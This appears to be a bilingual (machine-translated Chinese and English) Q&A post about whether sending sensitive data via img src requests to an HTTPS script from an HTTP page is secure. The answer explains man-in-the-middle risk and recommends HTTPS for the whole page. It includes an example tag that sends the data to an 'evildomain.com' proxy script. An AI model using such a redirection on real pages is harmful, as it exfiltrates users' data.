我有我需要传递的数据从浏览器无需重新加载页面（也称为AJAX）的服务器脚本。该数据是敏感，因此应该通过HTTPS传送。然而，该页面是HTTP层上。因为同一个域/协议的限制，浏览器不允许这样。

I have a server script that I need to pass data to from the browser without reloading the page (aka ajax). The data is sensitive so should be sent via https. The page however is on the http layer. Because of same domain/protocol restriction, the browser doesn't allow this.

我通过使用src标签，如动态创建的图像标记和调用脚本想着作弊系统中的位

I'm thinking of cheating the system a bit by dynamically creating image tags and call the script using the src tag such as:

<img src="https://mydomain.com/mysecurescript/&data=to&pass=to&my=script" />

我想知道，如果这确实将适当加密。

I'd like to know if this will indeed be properly encrypted.

推荐答案

这里的问题是，如果页面本身只是HTTP，那么你就容易受到中间人攻击的人。攻击者可以只修改脚本通过HTTP发送的页面，以便它而是使用：

The problem with this is if the page itself is only HTTP, then you're susceptible to a man in the middle attack. An attacker can just modify the script in the page sent over HTTP so that it instead uses:

<img src="http://evildomain.com/evilproxyscript/&data=to&pass=to&my=script" />

用户将没有最明智的。为了解决这个问题，你真的需要为通过HTTPS的页面太 - 同时它巧妙地解决了你的其他问题

The user will be none-the-wiser. To get around this you really need to serve the page over HTTPS too - which neatly solves your other problem at the same time.

（这是完全一样的原因，登录表单应该是HTTPS网页，而不仅仅是形式的行动是HTTPS）。

(This is exactly the same reason why login forms should be on HTTPS pages, rather than just the form action being HTTPS).